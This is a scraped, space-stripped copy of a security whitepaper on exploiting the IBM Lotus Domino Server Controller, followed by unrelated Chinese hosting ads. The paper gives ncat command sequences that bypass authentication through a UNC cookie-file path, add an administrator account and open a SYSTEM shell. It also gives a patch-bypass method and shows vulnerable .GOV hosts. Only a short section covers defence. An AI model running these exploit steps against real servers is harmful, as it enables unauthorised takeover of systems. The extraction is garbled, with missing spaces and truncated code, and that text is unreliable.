decompile404notfound

404notfound  时间:2021-02-25  阅读:()
LotusDomino:PenetrationThroughtheControllerAlexeySintsovERPscanCompanyEmail:a.
sintsov@erpscan.
comTwitter:@asintsovwww.
erpscan.
comwww.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com2ContentIntroduction3Stage1:Searchingatarget4Stage2:Chooseofbug5Stage3:Consoleprotocolresearch6Stage4.
ExploitforZDI-‐11-‐110.
10Stage5.
RequiemonSMB.
Exploit2.
12Stage6.
Exploitfor0day.
13Internet16HowtodefendLotusDominoConsole18Conclusions19Links20AboutAuthor21AboutDSecRGResearchcenterofERPScan22AboutERPScan23Th4nkZ24ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com3IntroductionIBMLotusDominoServertheapplicationserverwithdifferentservicessuchasmailserver,databaseserver,httpserverandothers.
InthisarticlewewilltalkaboutLotusDominoServerControllerthatgivescontrolovertargetserver.
Thisserviceismostcritical,soit'sanimportanttarget.
ThispapperdoesnotdescribeallpossiblevulnerabilitiesandmisconfigurationsofLotusDomino.
ItshowsfewofthepossiblewaystoattackLotusDominoandgetaccesstotheOS.
ThedocumentismeanttodrawattentiontothetypicalproblemsoftheDominoServerControllersecurity.
AlltestshavebeenperformedinLotusDomino8.
5.
2and8.
5.
3onOSWindows.
Whiledoinginternalpen-‐test(sometimesandwhiledoingexternaltoo),youmayfindinterestservice–LotusDominoServerController.
ThisisJAVAbasedapplicationthatgivestoadministratorremotecontroloverDominoserver.
ForusingthisserviceadministratorcanuseLotusDominoConsoleApplication.
Butforaccesstothisserviceyouneedtoknowloginandpassword.
Thisisprettystandardserviceandyoucanfounditifonlynetworkadministratordoesn'tfilterTCPportofthis.
Itisagoodtargetforanattackerorpenetrationtester,becausethisservicegivescontrolnotonlyforDominoServerbutalsocangiveaccesstoOSofserverwithrightsoftheprocessaccount.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com4Stage1:SearchingatargetIBMLotusDominoServerControlleruses2050/tcpportandSSLprotocolforencryptingdataandauthenticateserver.
Soinmostcasesfordetectingthisserviceyouneedtouseanynetworkscanners,likenmap:Nmap–sV192.
168.
0.
0/24–p2050Nmapscanreportfortargethost(192.
168.
0.
13)Hostisup(0.
0010slatency).
PORTSTATESERVICEVERSION2050/tcpopenssl/dominoconsoleLotusDominoConsole(domain:testdomain;description:"DSECRG")MACAddress:00:1A:1B:8A:5F:0E(HewlettPackard)ServiceInfo:OS:Windows/Longhorn/646.
1ThisresulttellsusnotonlyaboutLotusbutalsoaboutOSversion,itmaybeusefulforanyexploits,forexampleifwetalkaboutLotusDomino8.
5.
2FP2CVE-‐2011-‐0915(privateexploitexists),CVE-‐2011-‐0913(privateexploitexist)andCVE-‐2011-‐0914.
Thisexploitsuse"bufferoverflow"errorstoexecutearbitrarycode,butformostcases,especiallyforpenetrationteststhistypesofexploitscanbedangerous(sothisiswhyweneedtoknowOSversion).
Ifwewanttomakepenetration,wecantotryresearchthisbugsandreproduceexploits,butittakestime.
Ithink,mostclientsdonotunderstandpen-‐tester,ifhespendallhistimeofworkonexploitdevelopment(andfinallycrashtheservice…).
Ofcause,wecanbuyprivateexploit,butit'stakesmoney.
ButalsothisversionofLotusisvulnerabletoCVE-‐2011-‐1519(privateexploitexists).
Andlookslikeitissdesignerror…IlikedesignerrorsbecauseitiseasytoexploitandwecanexploititwithoutriskofDoS.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com5Stage2:ChooseofbugSowereproduceCVE-‐2011-‐1519detailshere[1]:TheremoteconsoleintheServerControllerinIBMLotusDomino7.
xand8.
xverifiescredentialsagainstafilelocatedataUNCsharepathnamespecifiedbytheclient,whichallowsremoteattackerstobypassauthentication,andconsequentlyexecutearbitrarycodebyplacingthispathnameintheCOOKIEFILEfield.
NOTE:thismightoverlapCVE-‐2011-‐0920.
ThisvulnerabilitywasfoundbyPatrikKarlssonanddisclosedbyTippingPointZDI[2].
Therearenomoredetails.
Soweneedtomakemoreresearchesforexploitingthisbug.
Itislookslikedonottakesalotoftimeforresearch(ControllerisJAVAbasedapplicationeasytodecompile)andmainthing:thisbuggivesremotecodeexecution.
Idealweaponforanypen-‐tester!
So,let'go…ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com6Stage3:ConsoleprotocolresearchFirstofallit'simportanttounderstandhowprotocolreallyworksandwhatisitsformatandetc.
Someinformation(simpleauth.
Processwithoutcookies)wecangetfromPatrik'sNSEscriptsfornmap,butforfullpicture(especiallyhowcookiefileprocessingworks)wecangetonlybydecompilingJavaclassforconsole.
ThisfilecanbefoundinLotusDominodistributivebyfollowingthepath:C:\ProgramFiles\IBM\Lotus\Domino\Data\domino\java\dconsole.
jar.
ThisJARisusedforboth:clientandserverside,soherewecanfindallneededinformation.
Let'sdecompileit,andfindcodethathandlesclientauthentication:function'run()'inNewClient.
class.
HereIgivesomecodethatIgotwithhelpofDJdecompiler[3],withmycomments://s1stringwithinputfrom2050/tcpif(s1.
equals("#EXIT"return2;CUTif(s1.
equals("#APPLET"))return6;if(s1.
equals("#COOKIEFILE"))if(stringtokenizer.
hasMoreTokens())cookieFilenamenextwordafter#COOKIEFILEcookieFilenamestringtokenizer.
nextToken().
trim(return7;if(!
1.
equals("#UI"))if(stringtokenizer.
hasMoreTokens())usrlogin,nextworduntilusrstringtokenizer.
nextToken(",").
trim();if(usrnull)return4;if(stringtokenizer.
hasMoreTokens())pwdpasswordpwdstringtokenizer.
nextToken().
trim();return0;CUTERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com7Thispartofcode(ReadFromUser()function)describesmaintokensandcommands'format,itisveryhelpful!
Let'sseenextpartofcode:/*loopwhilereadinginput*/doResultofreadinginputintovariable'i'intiReadFromUser(if(i6)//if#APPLETappletConnectiontrue;continue;CUTfindusernameinadmindata.
xmlandetcuserinfoUserManager.
findUser(usr);if(userinfonull)usernamenotfoundWriteToUser("NOT_REG_ADMIN");continue;if(!
appletConnection)//if#APPLETwasbefore.
.
.
without#APPLET,standardauth.
.
.
flagvrfyPwd.
verifyUserPassword(pwd,userinfo.
userPWD());else//Checkloginandpassword(APPLETMODE)BUGISHERE!
flagverifyAppletUserCookie(usr,pwd)if(flag)//IfAUTHdoneWriteToUser("VALID_USER");ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com8elseifnopeWriteToUser("WRONG_PASSWORD");while(true);//endloopif(flag)Ifauth.
succsessGetLotusDominoconsoletoauth.
userSo,nowweknow,thatforauthenticationwithcookiefileweneedtouse#APPLETtokenbefore#UI,thencheckingpasswordwillbedonenotbyverifyingUserPassword(pwd,userinfo.
userPWD())butbyverifyingAppletUserCookie(usr,pwd),where'usr'isinputtedusernameand'psw'inputtedpassword.
Let'sseehowverifyingofAppletUserCookie()works://cookieFilenamenexttokenreadafter#COOKIEFILEif(cookieFilenamenullcookieFilename.
length(0)returnflag;//UNCbughere!
FilefilenewFile(cookieFilename)intiint)file.
length();charac[newchar[i1];inputstreamreader.
read(ac,0,i);//s7stringbufferwithdatafromcookiefileStrings7newString(ac)doif((js7.
indexOf("SavethisfileonSMBsharedresource,forexampleonpublicfileserverorcreatesharedresourceonyourworkstationdependsfromfilterrulesinnetwork.
Forexamplewesavedthisfilebythispath:\\fileserver\public\cookie.
xmlNowwecandotheattack.
Weneedjustncatforthat.
DonotforgettorunitwithSSLsupport:ncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXITLOADCMD.
exe/Cnetuseraddusernamepassword/ADDBeginDataBeginDataCommandhasbeenexecutedonremoteserver.
Use'Live'consoleoptioninfuture,toviewresponsefromserver.
EndDataEndDataERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com11"#APPLET"commandtellserverthatwewantusecookiefileforauthentication.
So,whenwestartauthenticationprocessby"#UI"command,servertriestoopenfilethatwepointby"#COOKIEFILE"andusepasswordfromit.
After"#EXIT"commandClientinterfacewillbestartedandyoucanexecutecommands,forexamplebyusingoldgoodLOADcommand[4].
BydefaultyouwillgetJavainterface,soweneedtousepureAPI,withoutJavaoutput.
Forthisyouneedtouse"#API"before"#EXIT".
Commandwillbeexecuted,butwecan'tseeoutput.
Butifadministratorsetsecureconsoleoption(thatisrecommendationinZDIadvisoryforthisbug!
),wecan'tuseLOADorTELLcommands.
Butifouruserhasenoughprivileges,wecangetshellbyusingncatssltragetlotus2050#API#APPLET#COOKIEFILE\\fileserver\public\cookie.
xml#USERADDRESSdsecrg#UIusr,pswVALID_USER#EXIT$whoamiwhoamiBeginDataMicrosoftWindows[Version6.
1.
7601]Copyright(c)2009MicrosoftCorporation.
Allrightsreserved.
C:\Lotus\Domino\data>whoamiNTAUTHORITY\SYSTEMC:\Lotus\Domino\data>Theseprivilegesarenotsetbydefaults,butiftheyareset,wecanexecutesystemcommandswithoutLOADandTELLevenifconsoleisprotectedby'SetSecure'options.
Ifyouwanttochecktheseprivileges,youshouldopenadmindata.
xmlandcheckfortag,ifthereis4,25or26numbersintheline,itmeansthatprivilegesareset.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com12Stage5.
RequiemonSMB.
Exploit2.
Ok,nowwecanexploitthisissuewith'SetSecure'options.
ButwhatwecandoifwehavenotenoughprivilegesforexecutingsystemcommandstooDonotgiveup!
JustrememberaboutSMBRelay[5].
Ofcourse,ifwecanuseUNCasapathtothecookiefile,itisnormal,thatLotusservertriestomakeNTLMauthenticationonevilhost.
IfLotusServerrunswithdomainaccountthathaslocaladministratorsprivilegesorthesameaccountusedinanotherserver(reserveserver,foranexample)wecanuseSMBRelayattack.
Itisveryeasybyusingmeatsploitmodule,soIwillnottalkaboutitanymore.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com13Stage6.
Exploitfor0day.
NowfewwordsaboutfixinLotusDomino8.
5.
3:IBMjustaddbeforeanyCOOKIEFILEinput,sonowitwillbenot'\\evil\cookie\file'but'.
\\evil\cookie\file'Sowecan'tuseSMBshares.
Also,IBMaddsSSLclientauthenticationtotheconsoleserver.
SonowweneedtohavevalidSSLclient'scertificatebeforeconnectto2050.
Additionalproblem:evenwhenpatchisnotinstalleditisnotalwayspossibletouseUNCiftargetserverisinanothernetworkssegmentand/orSMBprotocolsarefiltered.
ForexampletargetserverisinanothercompanyfilialorintheInternet.
Inthiswaytargetservercan'tconnectbySMBtoyourSMBresource.
Patchbypass:Problemisinownpseudo-‐XMLparser,thatIBMwroteforparsingCOOKIEFILE.
Theformatofcookiefilemustbe(inidealworldofXML):Butinreal,when'XML'parserhandlescookiefile,ittriestofind"404NotFound2011-‐08-‐2209:19:1610.
10.
10.
1014613010.
10.
9.
947001400BadRequestItisimportanttomaketwoHTTPrequests,becauseweneedtohave'space'byteafter'functiononLoadConsole(){alert("Connected");}Inthis'exploit'wejustusedcosole.
jarbecauseofvalidcertificatesinit,soservercontrollercanauthenticateusbyourcertificateandwecanandspoofpathtocookiefilewithinjected'XML'.
Andmoreapplettakehostaddresfromcodebase,soyouneedtouseport-‐forwardingfrom127.
0.
0.
1:2050toremote_target:2050.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com16InternetJustsomescreenshot.
.
.
forfun…Pic1.
VulnerableLotusDominoControlleron.
GOVPic2.
DefaultSSLcert.
on.
GOVERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com17ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com18HowtodefendLotusDominoConsoleFirstofall,thisserviceisforadminsonly,soyoushouldcreaterulesonfirewallandfilteroutthisTCPport2050.
Secondthingthatyoushoulddoistoinstallpatches.
Butthisisnotall.
DonotforgetaboutconsolepasswordthatcanbesetandwillhelptopreventfromusingdangerouscommandslikeLOADandTELL.
Andfinallyitwouldbegreattoauditadmindata.
xmlfilesonsimplepasswords(hash)andprivilegesthatusershave.
TheseareminimumactionsthatcansaveyourLotusserver.
Ofcourse,youshouldalsocheckprocessaccountinOS,andfilterotherprotocolslikeSMBifitisnotnecessaryforbusiness.
ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com19ConclusionsFinallywehavefewwaystoexploitthisbug(ZDI-‐11-‐110)fordifferentcases,evenifpatchfromIBMisinstalled,soitisbecome0dayagain!
Alsowegetnewexploitforpen-‐testersthatcanbeeasilyusedinarealprojectandgiveniceresults.
Ihopethisarticlecouldbehelpfulforpenetrationtesters.
AttheendIwanttosayTHANKStoZDIteamandPatrikKarlssonforthebeautifulbug!
BestRegards.
AlexeySintsovERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com20Links[1]http://cve.
mitre.
org/cgi-‐bin/cvename.
cginame=CVE-‐2011-‐1519[2]http://www.
zerodayinitiative.
com/advisories/ZDI-‐11-‐110/[3]http://www.
neshkov.
com/dj.
html[4]http://dsecrg.
com/pages/pub/show.
phpid=24[5]http://dsecrg.
blogspot.
com/2011/01/new-‐blog-‐section-‐passthehash-‐bible.
htmlERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com21AboutAuthorAlexeySintsovMorethen10yearsinITsecurityarea.
CurrentlyworkintheleadingITsecuritycompanyERPScanasdirectorofISauditdepartment.
AlexeyisoneofthemainsecurityresearchersinDSecRG(DigitalSecurityResearchGroup).
OrganizerofRussianDefconGroup(DCG#7812).
HealsowritearticlesforRussianITsecuritymagazine'XAKEP'andmakepresentationsonconferences(CONFidence,HackInTheBox,ZeroNights,ChaosConstruction,PCIDSSRussiaandothers).
Hispublicworks:http://www.
exploit-‐db.
com/author/a=549ERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com22AboutDSecRGResearchcenterofERPScanDSecRGLeadingSAPAGpartnerindiscoveringandsolvingsecurityvulnerabilities.
ERPScanexpertiseisbasedonresearchconductedbytheDSecRGresearchcenterasubdivisionofERPScancompany.
ItdealswithvulnerabilityresearchandanalysisinbusinesscriticalapplicationsparticularlyinSAPandpublisheswhitepapersaboutit.
SAPAGgivesacknowledgementsforsecurityresearchersfromDSecRGalmosteverymonthontheirsite.
NowDSecRGexpertsareonthefirstplaceinSAPpublicacknowledgementschart.
DSecRGexpertsarefrequentspeakersinprimeInternationalconferencesheldinUSA,EUROPE,CEMEAandASIAsuchasBlackHat,HITB,SourceBarcelona,DeepSEC,Confidence,Troopers,T2,InfoSecurity.
DSecRGresearchersgainmultipleacknowledgementsfrombiggestsoftwarevendorslikeSAP,Oracle,IBM,VMware,Adobe,HP,Kasperskiy,Apache,Alcatelandothersforfindingvulnerabilitiesintheirsolutions.
DSecRGhashigh-‐qualifiedexpertsinstaffwhohaveexperienceindifferentfieldsofsecurity,fromWebapplicationsandreverseengineeringtoSCADAsystems,accumulatingtheirexperiencetoconductresearchinSAPsystemsecurity.
E-‐mail:info@dsecrg.
comWeb:www.
dsecrg.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com23AboutERPScanERPScanisaninnovativecompanyengagedintheresearchofERPsecurityanddevelopsproductsforERPsystemsecurityassessment.
Apartfromthisthecompanyrendersconsultingservicesforsecureconfiguration,developmentandimplementationofERPsystems,andconductscomprehensiveassessmentsandpenetrationtestingofcustomsolutions.
Ourflagshipproductsare"ERPScanSecurityScannerforSAP"andservice"ERPScanOnline"whichcanhelpcustomerstoperformautomatedsecurityassessmentsandcompliancechecksforSAPsolutions.
Contact:info[at]erpscan[dot]comhttp://www.
erpscan.
comERPScanSecuritySoftwareforSAPwww.
erpscan.
comwww.
dsecrg.
com24Th4nkZJustagainandmore:PatrikKarlssongoodjobasalways!
AlexandrMinojenko[DSecRG]–fortipsandadvises.
AlexandrPolyakov[DSecRG]–forthetemplate8)Thankstoallmyteam:Alexey"GreenDog"Tyurin,GlebCherbov,DmitryChastuhin,DmitriEvdokimovAndalsooneDisRespecttoRuslanKarmanov(heisrudeguy,don'tlikehim)

virmach:AMD平台小鸡,赌一把,单车变摩托?$7.2/年-512M内存/1核/10gSSD/1T流量,多机房可选

virmach送来了夏季促销,价格低到爆炸,而且在低价的基础上还搞首年8折,也就是说VPS低至7.2美元/年。不过,这里有一点要说明:你所购买的当前的VPS将会在09/30/2021 ~ 04/30/2022进行服务器转移,而且IP还会改变,当前的Intel平台会换成AMD平台,机房也会变动(目前来看以后会从colocrossing切换到INAP和Psychz),采取的是就近原则,原来的水牛城可能...

Gcore(75折)迈阿密E5-2623v4 CPU独立服务器

部落分享过多次G-core(gcorelabs)的产品及评测信息,以VPS主机为主,距离上一次分享商家的独立服务器还在2年多前,本月初商家针对迈阿密机房限定E5-2623v4 CPU的独立服务器推出75折优惠码,活动将在9月30日到期,这里再分享下。G-core(gcorelabs)是一家总部位于卢森堡的国外主机商,主要提供基于KVM架构的VPS主机和独立服务器租用等,数据中心包括俄罗斯、美国、日...

hostkey俄罗斯、荷兰GPU显卡服务器/免费Windows Server

Hostkey.com成立于2007年的荷兰公司,主要运营服务器出租与托管,其次是VPS、域名、域名证书,各种软件授权等。hostkey当前运作荷兰阿姆斯特丹、俄罗斯莫斯科、美国纽约等数据中心。支持Paypal,信用卡,Webmoney,以及支付宝等付款方式。禁止VPN,代理,Tor,网络诈骗,儿童色情,Spam,网络扫描,俄罗斯色情,俄罗斯电影,俄罗斯MP3,俄罗斯Trackers,以及俄罗斯法...

404notfound为你推荐
bbsxp老大!!您好!我是初学者!请问我的bbsxp如何更改顶端左面的LOGO??博客外链博客和博客之间怎么建超级链接无线路由器限速设置无线路由器限速怎么设置!免费开通黄钻怎样能免费开通黄钻会员今日热点怎么删除今日热点怎么卸载删除 今日热点新闻彻底卸载删直播加速请问哪种播放器的可以播放加速,并且可以保存php购物车php session实现购物车的原理声母是什么哪些是声母,哪些是韵母,freebsd安装FreeBSD系统NetBSD系统OpenBSD系统 这三个系统安装方法相似吗?用什么方法装哦?recovery教程Recovery是什么?怎样使用Recovery刷机?
ip查域名 长沙域名注册公司 vps教程 查询ip地址 qq空间域名 香港ufo kdata edis 哈喽图床 css样式大全 xen eq2 灵动鬼影 合租空间 老左来了 国外ip加速器 银盘服务 厦门电信 美国独立日 四川电信商城 更多